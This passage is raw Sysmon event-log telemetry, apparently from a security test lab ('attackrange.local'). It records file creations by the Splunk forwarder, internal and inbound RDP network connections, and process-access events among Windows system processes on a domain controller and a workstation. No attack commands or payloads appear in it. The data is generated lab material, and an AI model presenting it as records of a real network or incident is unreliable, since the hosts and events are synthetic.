Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8DEAA4DD6676A1438A4C4E02F64462E,SHA256=AB2F7064D4858C91C72FFC8247304BC178E67DE3C67A538C936C37DC32636609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:30.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43F44EE968625FF9DEFE991D89A7B630,SHA256=3C4A419998C7284BED5D5E66A395B926DC92673070E62EC0251A28A5914F897A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:30.165{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=50EB95A58DF742083A367C084B245753,SHA256=B1CDA85E974EBD15708C541C8B550B42EC1084C14FC13EC3E27E873995F634C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809093Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.220{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57370-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:31.322{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCD4748F55CD8E002E4BEACC107FD1F,SHA256=46222066880C24F6C6E9017AA1E937ABBD19D33D016FB4D7AB9FAB0CA974432A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:23.771{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51147-false10.0.1.12-8000- 23542300x80000000000000001052047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:31.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D30FB793AD821EB71CB4B172D2ED6B1E,SHA256=8227288BECE44202D82B1E94B998C67AF13D5C6011A8E0F6C527BB4CF4F2E9F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:32.353{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D564AA63AD7786103DE493BED863098D,SHA256=6529E6B2BA46041E4B652E8120723048E83EDDA1E62B1C5ADFDC0E178FF8C170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:32.082{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF9A3B89557E28FACC8C50833B89BE50,SHA256=963C451B1C04CDC95F731DA4B37405FBCFC8747E5C2509DD85EEF14CDD9B6970,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:33.400{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B00293AD05642F5316FFF96940E0273,SHA256=22E39502C674AB23AB5F579C54A4FC8C32BCC4C7F5F2285AB5E65DA93BAEA407,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:33.120{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:33.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F22A9E87A911FB16B33E6CCABB0C9F0,SHA256=65486115665F335C889BCED6BA6B68DB45E38A886E089F3ECA0E6E3E8FF149F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:34.415{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=118E29ED0830EDFB2CD73B6C0F9D70C3,SHA256=4FC504E270FFCF322238F0B05B8CC5C9A34E6D35E51101AE91ADC4DB947D985B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:34.135{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36ED00A1EC6155259E90B03A3950FE0E,SHA256=D883256A664469F5635ED79F6FF1D02BF7229D60394CD2CBE518D7DE04EF6E6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:34.290{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E84E28C1FD04C4B0E70EA130AF10CC3C,SHA256=7D6FDDD5295D74EC3D5F91DB7D940AFF4EE7FD19BABDFC16D5A41D462D702FB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:32.768{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-28399-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000809099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:32.391{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57371-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:35.418{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A09D90666857CE10206C3DDC44E3A33,SHA256=D3F795FBB5D4823AB0F290C981ABB1D98D4FBF5F8089ACEF15B65A371D26B2B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:35.151{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DFCDB1FD00263BFF4D5BAC33410257D,SHA256=2B0DA69AB06F668CF92E595A29A1093D37F6D004FAA4215FC9BAA7F0938A2BF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:35.035{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:36.449{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09D597A27C4E9CDE01E5C40DC1787145,SHA256=1E5458F1BF58BFA6F0AC7100CBB99BA983048F25010550E39F35D3F41116FAE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.781{466BC892-02AF-60E8-1300-00000000CF01}9761504C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.765{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.765{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.765{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.765{466BC892-F6A4-60EB-A17D-00000000CF01}9872136C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.750{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.750{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.734{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F6A4-60EB-A17D-00000000CF01}9872C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1014c0C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\appinfo.dll+33d8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:36.718{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 